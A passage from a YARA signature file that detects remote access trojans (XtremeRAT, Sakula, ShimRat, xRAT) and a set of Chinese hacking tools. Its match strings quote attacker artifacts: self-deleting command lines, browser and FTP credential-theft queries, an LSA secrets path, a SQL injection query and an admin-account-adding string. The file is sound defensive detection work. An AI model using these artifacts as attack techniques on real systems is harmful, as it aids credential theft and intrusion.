    $verSpecific1 = "sevane.tmp"
    $verSpecific2 = "cmd_.bat"
    $verSpecific3 = "a2b7c3d7e4"
    $verSpecific4 = "cmd.dll"
  condition:
    all of them
}

rule UPX : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
  strings:
    $a = "UPX0"
    $b = "UPX1"
    $c = "UPX!"
  condition:
    all of them
}

rule Vertex : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Vertex"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $string1 = "DEFPATH"
    $string2 = "HKNAME"
    $string3 = "HPORT"
    $string4 = "INSTALL"
    $string5 = "IPATH"
    $string6 = "MUTEX"
    $res1 = "PANELPATH"
    $res2 = "ROOTURL"
  condition:
    all of them
}

rule VirusRat : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/VirusRat"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $string0 = "virustotal"
    $string1 = "virusscan"
    $string2 = "abccba"
    $string3 = "pronoip"
    $string4 = "streamWebcam"
    $string5 = "DOMAIN_PASSWORD"
    $string6 = "Stub.Form1.resources"
    $string7 = "ftp://{0}@{1}" wide
    $string8 = "SELECT * FROM moz_logins" wide
    $string9 = "SELECT * FROM moz_disabledHosts" wide
    $string10 = "DynDNS\\Updater\\config.dyndns" wide
    $string11 = "|BawaneH|" wide
  condition:
    all of them
}

rule unrecom : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/AAR"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $meta = "META-INF"
    $conf = "load/ID"
    $a = "load/JarMain.class"
    $b = "load/MANIFEST.MF"
    $c = "plugins/UnrecomServer.class"
  condition:
    all of them
}

rule sakula_v1_0 : RAT {
  meta:
    description = "Sakula v1.0"
    date = "2015-10-13"
    author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
  strings:
    $m1 = "%d_of_%d_for_%s_on_%s"
    $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
    $m3 = "=%s&type=%d"
    $m4 = "?photoid="
    $m5 = "iexplorer"
    $m6 = "net start \"%s\""
    $v1_1 = "MicroPlayerUpdate.exe"
    $MZ = "MZ"
  condition:
    $MZ at 0 and all of ($m*) and not $v1_1
}

rule sakula_v1_1 : RAT {
  meta:
    description = "Sakula v1.1"
    date = "2015-10-13"
    author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
  strings:
    $m1 = "%d_of_%d_for_%s_on_%s"
    $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
    $m3 = "=%s&type=%d"
    $m4 = "?photoid="
    $m5 = "iexplorer"
    $m6 = "net start \"%s\""
    $v1_1 = "MicroPlayerUpdate.exe"
    $MZ = "MZ"
  condition:
    $MZ at 0 and all of them
}

rule sakula_v1_2 : RAT {
  meta:
    description = "Sakula v1.2"
    date = "2015-10-13"
    author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
  strings:
    $m1 = "%d_of_%d_for_%s_on_%s"
    $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
    $m3 = "cmd.exe /c rundll32 \"%s\""
    $v1_1 = "MicroPlayerUpdate.exe"
    $v1_2 = "CCPUpdate"
    $MZ = "MZ"
  condition:
    $MZ at 0 and $m1 and $m2 and $m3 and $v1_2 and not $v1_1
}

rule sakula_v1_3 : RAT {
  meta:
    description = "Sakula v1.3"
    date = "2015-10-13"
    author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
  strings:
    $m1 = "%d_of_%d_for_%s_on_%s"
    $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
    $m3 = "cmd.exe /c rundll32 \"%s\""
    $v1_3 = { 81 3E 78 03 00 00 75 57 8D 54 24 14 52 68 0C 05 41 00 68 01 00 00 80 FF 15 00 F0 40 00 85 C0 74 10 8B 44 24 14 68 2C 31 41 00 50 FF 15 10 F0 40 00 8B 4C 24 14 51 FF 15 24 F0 40 00 E8 0F 09 00 }
    $MZ = "MZ"
  condition:
    $MZ at 0 and all of them
}

rule sakula_v1_4 : RAT {
  meta:
    description = "Sakula v1.4"
    date = "2015-10-13"
    author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
  strings:
    $m1 = "%d_of_%d_for_%s_on_%s"
    $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
    $m3 = "cmd.exe /c rundll32 \"%s\""
    $v1_4 = { 50 E8 CD FC FF FF 83 C4 04 68 E8 03 00 00 FF D7 56 E8 54 12 00 00 E9 AE FE FF FF E8 13 F5 FF FF }
    $MZ = "MZ"
  condition:
    $MZ at 0 and all of them
}

rule ShadowTech_2 {
  meta:
    description = "ShadowTech RAT"
    author = "botherder https://github.com/botherder"
  strings:
    $string1 = /\#(S)trings/
    $string2 = /\#(G)UID/
    $string3 = /\#(B)lob/
    $string4 = /(S)hadowTech Rat\.exe/
    $string5 = /(S)hadowTech_Rat/
  condition:
    all of them
}

rule ShadowTech {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/ShadowTech"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "ShadowTech" nocase
    $b = "DownloadContainer"
    $c = "MySettings"
    $d = "System.Configuration"
    $newline = "#-@NewLine@-#" wide
    $split = "pSIL" wide
    $key = "ESIL" wide
  condition:
    4 of them
}

rule shimrat : RAT {
  meta:
    description = "Detects ShimRat and the ShimRat loader"
    author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
    date = "20/11/2015"
    ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/"
  strings:
    $dll = ".dll"
    $dat = ".dat"
    $headersig = "QWERTYUIOPLKJHG"
    $datasig = "MNBVCXZLKJHGFDS"
    $datamarker1 = "Data$$00"
    $datamarker2 = "Data$$01%c%sData"
    $cmdlineformat = "ping localhost -n 9 /c %s > nul"
    $demoproject_keyword1 = "Demo"
    $demoproject_keyword2 = "Win32App"
    $comspec = "COMSPEC"
    $shim_func1 = "ShimMain"
    $shim_func2 = "NotifyShims"
    $shim_func3 = "GetHookAPIs"
  condition:
    ($dll and $dat and $headersig and $datasig) or ($datamarker1 and $datamarker2) or ($cmdlineformat and $demoproject_keyword1 and $demoproject_keyword2 and $comspec) or ($dll and $dat and $shim_func1 and $shim_func2 and $shim_func3)
}

rule shimratreporter : RAT {
  meta:
    description = "Detects ShimRatReporter"
    author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
    date = "20/11/2015"
    ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/"
  strings:
    $IpInfo = "IP-INFO"
    $NetworkInfo = "Network-INFO"
    $OsInfo = "OS-INFO"
    $ProcessInfo = "Process-INFO"
    $BrowserInfo = "Browser-INFO"
    $QueryUserInfo = "QueryUser-INFO"
    $UsersInfo = "Users-INFO"
    $SoftwareInfo = "Software-INFO"
    $AddressFormat = "%02X-%02X-%02X-%02X-%02X-%02X"
    $proxy_str = "(from environment) = %s"
    $netuserfun = "NetUserEnum"
    $networkparams = "GetNetworkParams"
  condition:
    all of them
}

rule TerminatorRat : RAT {
  meta:
    description = "Terminator RAT"
    author = "Jean-Philippe Teissier / @Jipe_"
    date = "2013-10-24"
    filetype = "memory"
    version = "1.0"
    ref1 = "http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html"
  strings:
    $a = "Accelorator"
    $b = "<html><title>12356</title><body>"
  condition:
    all of them
}

rule TROJAN_Notepad_shell_crew : Trojan {
  meta:
    author = "RSA_IR"
    Date = "4Jun13"
    File = "notepad.exe v 1.1"
    MD5 = "106E63DBDA3A76BEEB53A8BBD8F98927"
  strings:
    $s1 = "75BAA77C842BE168B0F66C42C7885997"
    $s2 = "B523F63566F407F3834BCC54AAA32524"
  condition:
    $s1 or $s2
}

rule Xtreme {
  meta:
    description = "Xtreme RAT"
    author = "botherder https://github.com/botherder"
  strings:
    $string1 = /(X)tremeKeylogger/ ascii wide
    $string2 = /(X)tremeRAT/ ascii wide
    $string3 = /(X)TREMEUPDATE/ ascii wide
    $string4 = /(S)TUBXTREMEINJECTED/ ascii wide
    $unit1 = /(U)nitConfigs/ ascii wide
    $unit2 = /(U)nitGetServer/ ascii wide
    $unit3 = /(U)nitKeylogger/ ascii wide
    $unit4 = /(U)nitCryptString/ ascii wide
    $unit5 = /(U)nitInstallServer/ ascii wide
    $unit6 = /(U)nitInjectServer/ ascii wide
    $unit7 = /(U)nitBinder/ ascii wide
    $unit8 = /(U)nitInjectProcess/ ascii wide
  condition:
    5 of them
}

rule xtreme_rat : Trojan {
  meta:
    author = "Kevin Falcoz"
    date = "23/02/2013"
    description = "Xtreme RAT"
  strings:
    $signature1 = { 58 00 54 00 52 00 45 00 4D 00 45 }
  condition:
    $signature1
}

rule XtremeRATCode : XtremeRAT Family {
  meta:
    description = "XtremeRAT code features"
    author = "Seth Hardy"
    last_modified = "2014-07-09"
  strings:
    $ = { E8 ?? ?? ?? ?? DD D8 }
    $ = { C6 85 ?? ?? ?? ?? 4D C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 62 C6 85 ?? ?? ?? ?? 6D }
  condition:
    all of them
}

rule XtremeRATStrings : XtremeRAT Family {
  meta:
    description = "XtremeRAT Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-07-09"
  strings:
    $ = "dqsaazere"
    $ = "-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32"
  condition:
    all of them
}

rule XtremeRAT : Family {
  meta:
    description = "XtremeRAT"
    author = "Seth Hardy"
    last_modified = "2014-07-09"
  condition:
    XtremeRATCode or XtremeRATStrings
}

rule xtremrat : rat {
  meta:
    author = "Jean-Philippe Teissier / @Jipe_"
    description = "Xtrem RAT v3.5"
    date = "2012-07-12"
    version = "1.0"
    filetype = "memory"
  strings:
    $a = "XTREME" wide
    $b = "XTREMEBINDER" wide
    $c = "STARTSERVERBUFFER" wide
    $d = "SOFTWARE\\XtremeRAT" wide
    $e = "XTREMEUPDATE" wide
    $f = "XtremeKeylogger" wide
    $g = "myversion|3.5" wide
    $h = "xtreme rat" wide nocase
  condition:
    2 of them
}

rule xtreme_rat_0 {
  meta:
    maltype = "Xtreme RAT"
    reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/xtreme-rat-targets-israeli-government/"
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "5156"
    $data = "windows\\system32\\sethc.exe"
    $type1 = "Microsoft-Windows-Security-Auditing"
    $eventid1 = "4688"
    $data1 = "AppData\\Local\\Temp\\Microsoft Word.exe"
  condition:
    all of them
}

rule xtreme_rat_1 {
  meta:
    maltype = "Xtreme RAT"
    ref = "https://github.com/reed1713"
    reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/xtreme-rat-targets-israeli-government/"
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "5156"
    $data = "windows\\system32\\sethc.exe"
    $type1 = "Microsoft-Windows-Security-Auditing"
    $eventid1 = "4688"
    $data1 = "AppData\\Local\\Temp\\Microsoft Word.exe"
  condition:
    all of them
}

rule zoxPNG_RAT {
  meta:
    Author = "Novetta Advanced Research Group"
    Date = "2014/11/14"
    Description = "ZoxPNG RAT, url inside"
    Reference = "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf"
  strings:
    $url = "png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58"
  condition:
    $url
}

rule jRAT_conf : RAT {
  meta:
    description = "jRAT configuration"
    author = "Jean-Philippe Teissier / @Jipe_"
    date = "2013-10-11"
    filetype = "memory"
    version = "1.0"
    ref1 = "https://github.com/MalwareLu/config_extractor/blob/master/config_jRAT.py"
    ref2 = "http://www.ghettoforensics.com/2013/10/dumping-malware-configuration-data-from.html"
  strings:
    $a = /port=[0-9]{1,5}SPLIT/
  condition:
    $a
}

rule xRAT : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/xRat"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $v1a = "DecodeProductKey"
    $v1b = "StartHTTPFlood"
    $v1c = "CodeKey"
    $v1d = "MESSAGEBOX"
    $v1e = "GetFilezillaPasswords"
    $v1f = "DataIn"
    $v1g = "UDPzSockets"
    $v1h = { 52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41 }
    $v2a = "<URL>k__BackingField"
    $v2b = "<RunHidden>k__BackingField"
    $v2c = "DownloadAndExecute"
    $v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide
    $v2e = "england.png" wide
    $v2f = "Showed Messagebox" wide
  condition:
    all of ($v1*) or all of ($v2*)
}

rule xRAT20 : RAT {
  meta:
    author = "Rottweiler"
    date = "2015-08-20"
    description = "Identifies xRAT 2.0 samples"
    maltype = "Remote Access Trojan"
    hash0 = "cda610f9cba6b6242ebce9f31faf5d9c"
    hash1 = "60d7b0d2dfe937ac6478807aa7043525"
    hash2 = "d1b577fbfd25cc5b873b202cfe61b5b8"
    hash3 = "1820fa722906569e3f209d1dab3d1360"
    hash4 = "8993b85f5c138b0afacc3ff04a2d7871"
    hash5 = "0c231ed8a800b0f17f897241f1d5f4e3"
    hash1 = "60d7b0d2dfe937ac6478807aa7043525"
    hash8 = "2c198e3e0e299a51e5d955bb83c62a5e"
    sample_filetype = "exe"
    yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
  strings:
    $string0 = "GetDirectory: File not found" wide
    $string1 = "<>m__Finally8"
    $string2 = "Secure"
    $string3 = "ReverseProxyClient"
    $string4 = "DriveDisplayName"
    $string5 = "<IsError>k__BackingField"
    $string6 = "set_InstallPath"
    $string7 = "memcmp"
    $string8 = "urlHistory"
    $string9 = "set_AllowAutoRedirect"
    $string10 = "lpInitData"
    $string11 = "reader"
    $string12 = "<FromRawDataGlobal>d__f"
    $string13 = "mq.png" wide
    $string14 = "remove_KeyDown"
    $string15 = "ProtectedData"
    $string16 = "m_hotkeys"
    $string17 = "get_Hour"
    $string18 = "\\mozglue.dll" wide
  condition:
    18 of them
}

rule mswin_check_lm_group {
  meta:
    description = "Chinese Hacktool Set - file mswin_check_lm_group.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "115d87d7e7a3d08802a9e5fd6cd08e2ec633c367"
  strings:
    $s1 = "Valid_Global_Groups: checking group membership of '%s\\%s'." ascii fullword
    $s2 = "Usage: %s [-D domain][-G][-P][-c][-d][-h]" ascii fullword
    $s3 = "-D    default user Domain" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 389120 and all of them
}

rule WAF_Bypass {
  meta:
    description = "Chinese Hacktool Set - file WAF-Bypass.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "860a9d7aac2ce3a40ac54a4a0bd442c6b945fa4e"
  strings:
    $s1 = "Email: blacksplitn@gmail.com" wide fullword
    $s2 = "User-Agent:" wide fullword
    $s3 = "Send Failed.in RemoteThread" ascii fullword
    $s4 = "www.example.com" wide fullword
    $s5 = "Get Domain:%s IP Failed." ascii fullword
    $s6 = "Connect To Server Failed." ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 8183808 and 5 of them
}

rule Guilin_veterans_cookie_spoofing_tool {
  meta:
    description = "Chinese Hacktool Set - file Guilin veterans cookie spoofing tool.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "06b1969bc35b2ee8d66f7ce8a2120d3016a00bb1"
  strings:
    $s0 = "kernel32.dll^G" ascii fullword
    $s1 = "\\.Sus\"B" ascii fullword
    $s4 = "u56Load3" ascii fullword
    $s11 = "O MYTMP(iM) VALUES (" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1420288 and all of them
}

rule MarathonTool {
  meta:
    description = "Chinese Hacktool Set - file MarathonTool.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "084a27cd3404554cc799d0e689f65880e10b59e3"
  strings:
    $s0 = "MarathonTool" ascii
    $s17 = "/Blind SQL injection tool based in heavy queries" ascii fullword
    $s18 = "SELECT UNICODE(SUBSTRING((system_user),{0},1))" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 1064960 and all of them
}

rule PLUGIN_TracKid {
  meta:
    description = "Chinese Hacktool Set - file TracKid.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "a114181b334e850d4b33e9be2794f5bb0eb59a09"
  strings:
    $s0 = "E-mail: cracker_prince@163.com" ascii fullword
    $s1 = ".\\TracKid Log\\%s.txt" ascii fullword
    $s2 = "Coded by prince" ascii fullword
    $s3 = "TracKid.dll" ascii fullword
    $s4 = ".\\TracKid Log" ascii fullword
    $s5 = "%08x -- %s" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 204800 and 3 of them
}

rule Pc_pc2015 {
  meta:
    description = "Chinese Hacktool Set - file pc2015.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "de4f098611ac9eece91b079050b2d0b23afe0bcb"
  strings:
    $s0 = "\\svchost.exe" ascii fullword
    $s1 = "LON\\OD\\O-\\O)\\O%\\O!\\O=\\O9\\O5\\O1\\O" ascii fullword
    $s8 = "%s%08x.001" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 316416 and all of them
}

rule sekurlsa {
  meta:
    description = "Chinese Hacktool Set - file sekurlsa.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
  strings:
    $s1 = "Bienvenue dans un processus distant" wide fullword
    $s2 = "Format d'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur" wide
    $s3 = "SECURITY\\Policy\\Secrets" wide fullword
    $s4 = "Injection de donn" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 1177600 and all of them
}

rule mysqlfast {
  meta:
    description = "Chinese Hacktool Set - file mysqlfast.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "32b60350390fe7024af7b4b8fbf50f13306c546f"
  strings:
    $s2 = "Invalid password hash: %s" ascii fullword
    $s3 = "-= MySql Hash Cracker =- " ascii fullword
    $s4 = "Usage: %s hash" ascii fullword
    $s5 = "Hash: %08lx%08lx" ascii fullword
    $s6 = "Found pass: " ascii fullword
    $s7 = "Pass not found" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 921600 and 4 of them
}

rule DTools2_02_DTools {
  meta:
    description = "Chinese Hacktool Set - file DTools.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "9f99771427120d09ec7afa3b21a1cb9ed720af12"
  strings:
    $s0 = "kernel32.dll" ascii
    $s1 = "TSETPASSWORDFORM" wide fullword
    $s2 = "TGETNTUSERNAMEFORM" wide fullword
    $s3 = "TPORTFORM" wide fullword
    $s4 = "ShellFold" ascii fullword
    $s5 = "DefaultPHotLigh" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 2048000 and all of them
}

rule dll_PacketX {
  meta:
    description = "Chinese Hacktool Set - file PacketX.dll - ActiveX wrapper for WinPcap packet capture library"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    score = 50
    hash = "3f0908e0a38512d2a4fb05a824aa0f6cf3ba3b71"
  strings:
    $s9 = "[Failed to load winpcap packet.dll." wide
    $s10 = "PacketX Version" wide
  condition:
    uint16(0) == 23117 and filesize < 1966080 and all of them
}

rule SqlDbx_zhs {
  meta:
    description = "Chinese Hacktool Set - file SqlDbx_zhs.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "e34228345498a48d7f529dbdffcd919da2dea414"
  strings:
    $s0 = "S.failed_logins \"Failed Login Attempts\", " ascii fullword
    $s7 = "SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLE" ascii fullword
    $s8 = "SELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'" ascii
    $s9 = "bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:" ascii
    $s11 = "L.login_policy_name AS \"Login Policy\", " ascii fullword
    $s12 = "mailto:support@sqldbx.com" ascii fullword
    $s15 = "S.last_login_time \"Last Login\", " ascii fullword
  condition:
    uint16(0) == 23117 and 4 of them
}

rule ms10048_x86 {
  meta:
    description = "Chinese Hacktool Set - file ms10048-x86.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "e57b453966e4827e2effa4e153f2923e7d058702"
  strings:
    $s1 = "[ ] Resolving PsLookupProcessByProcessId" ascii fullword
    $s2 = "The target is most likely patched." ascii fullword
    $s3 = "Dojibiron by Ronald Huizer, (c) master@h4cker.us ." ascii fullword
    $s4 = "[ ] Creating evil window" ascii fullword
    $s5 = "%sHANDLEF_INDESTROY" ascii fullword
    $s6 = "[+] Set to %d exploit half succeeded" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and 4 of them
}

rule Dos_ch {
  meta:
    description = "Chinese Hacktool Set - file ch.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "60bbb87b08af840f21536b313a76646e7c1f0ea7"
  strings:
    $s0 = "/Churraskito/-->Usage: Churraskito.exe \"command\" " ascii fullword
    $s4 = "fuck,can't find WMI process PID." ascii fullword
    $s5 = "/Churraskito/-->Found token %s " ascii fullword
    $s8 = "wmiprvse.exe" ascii fullword
    $s10 = "SELECT * FROM IIsWebInfo" ascii fullword
    $s17 = "WinSta0\\Default" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 266240 and 3 of them
}

rule DUBrute_DUBrute {
  meta:
    description = "Chinese Hacktool Set - file DUBrute.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "8aaae91791bf782c92b97c6e1b0f78fb2a9f3e65"
  strings:
    $s1 = "IP - %d; Login - %d; Password - %d; Combination - %d" ascii fullword
    $s2 = "IP - 0; Login - 0; Password - 0; Combination - 0" ascii fullword
    $s3 = "Create %d IP@Loginl;Password" ascii fullword
    $s4 = "UBrute.com" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1044480 and all of them
}

rule CookieTools {
  meta:
    description = "Chinese Hacktool Set - file CookieTools.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "b6a3727fe3d214f4fb03aa43fb2bc6fadc42c8be"
  strings:
    $s0 = "http://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=" ascii fullword
    $s2 = "No data to read.$Can not bind in port range (%d - %d)" wide fullword
    $s3 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
    $s8 = "OnGetPasswordP" ascii fullword
    $s12 = "http://www.chinesehack.org/" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 5120000 and 2 of them
}

rule update_PcInit {
  meta:
    description = "Chinese Hacktool Set - file PcInit.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "a6facc4453f8cd81b8c18b3b3004fa4d8e2f5344"
  strings:
    $s1 = "\\svchost.exe" ascii fullword
    $s2 = "%s%08x.001" ascii fullword
    $s3 = "Global\\ps%08x" ascii fullword
    $s4 = "drivers\\" ascii fullword
    $s5 = "StrStrA" ascii fullword
    $s6 = "StrToIntA" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 51200 and all of them
}

rule dat_NaslLib {
  meta:
    description = "Chinese Hacktool Set - file NaslLib.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "fb0d4263118faaeed2d68e12fab24c59953e862d"
  strings:
    $s1 = "nessus_get_socket_from_connection: fd <%d> is closed" ascii fullword
    $s2 = "[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%d" ascii fullword
    $s3 = "A FsSniffer backdoor seems to be running on this port%s" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1392640 and all of them
}

rule Dos_1 {
  meta:
    description = "Chinese Hacktool Set - file 1.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "b554f0687a12ec3a137f321cc15e052ff219f28c"
  strings:
    $s1 = "/churrasco/-->Usage: Churrasco.exe \"command to run\"" ascii fullword
    $s2 = "/churrasco/-->Done, command should have ran as SYSTEM!" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and all of them
}

rule OtherTools_servu {
  meta:
    description = "Chinese Hacktool Set - file svu.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "5c64e6879a9746a0d65226706e0edc7a"
  strings:
    $s0 = "MZKERNEL32.DLL" ascii fullword
    $s1 = "UpackByDwing@" ascii fullword
    $s2 = "GetProcAddress" ascii fullword
    $s3 = "WriteFile" ascii fullword
  condition:
    $s0 at 0 and filesize < 51200 and all of them
}

rule ustrrefadd {
  meta:
    description = "Chinese Hacktool Set - file ustrrefadd.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "b371b122460951e74094f3db3016264c9c8a0cfa"
  strings:
    $s0 = "E-Mail  : admin@luocong.com" ascii fullword
    $s1 = "Homepage: http://www.luocong.com" ascii fullword
    $s2 = ": %d  -  " ascii fullword
    $s3 = "ustrreffix.dll" ascii fullword
    $s5 = "Ultra String Reference plugin v%d.%02d" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 327680 and all of them
}

rule XScanLib {
  meta:
    description = "Chinese Hacktool Set - file XScanLib.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
  strings:
    $s4 = "XScanLib.dll" ascii fullword
    $s6 = "Ports/%s/%d" ascii fullword
    $s8 = "DEFAULT-TCP-PORT" ascii fullword
    $s9 = "PlugCheckTcpPort" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 368640 and all of them
}

rule IDTools_For_WinXP_IdtTool {
  meta:
    description = "Chinese Hacktool Set - file IdtTool.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "ebab6e4cb7ea82c8dc1fe4154e040e241f4672c6"
  strings:
    $s2 = "IdtTool.sys" ascii fullword
    $s4 = "Idt Tool bY tMd[CsP]" wide fullword
    $s6 = "\\\\.\\slIdtTool" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 25600 and all of them
}

rule GoodToolset_ms11046 {
  meta:
    description = "Chinese Hacktool Set - file ms11046.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
  strings:
    $s1 = "[*] Token system command" ascii fullword
    $s2 = "[*] command add user 90sec 90sec" ascii fullword
    $s3 = "[*] Add to Administrators success" ascii fullword
    $s4 = "[*] User has been successfully added" ascii fullword
    $s5 = "Program: %s%s%s%s%s%s%s%s%s%s%s" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 860160 and 2 of them
}

rule Cmdshell32 {
  meta:
    description = "Chinese Hacktool Set - file Cmdshell32.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "3c41116d20e06dcb179e7346901c1c11cd81c596"
  strings:
    $s1 = "cmdshell.exe" wide fullword
    $s2 = "cmdshell" ascii fullword
    $s3 = "[Root@CmdShell ~]#" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 63488 and all of them
}

rule Sniffer_analyzer_SSClone_1210_full_version {
  meta:
    description = "Chinese Hacktool Set - file Sniffer analyzer SSClone 1210 full version.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "6882125babb60bd0a7b2f1943a40b965b7a03d4e"
  strings:
    $s0 = "http://www.vip80000.com/hot/index.html" ascii fullword
    $s1 = "GetConnectString" ascii fullword
    $s2 = "CnCerT.Safe.SSClone.dll" ascii fullword
    $s3 = "(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 3665920 and all of them
}

rule x64_klock {
  meta:
    description = "Chinese Hacktool Set - file klock.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
  strings:
    $s1 = "Bienvenue dans un processus distant" wide fullword
    $s2 = "klock.dll" ascii fullword
    $s3 = "Erreur : le bureau courant (" wide fullword
    $s4 = "klock de mimikatz pour Windows" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 928768 and all of them
}

rule Dos_Down32 {
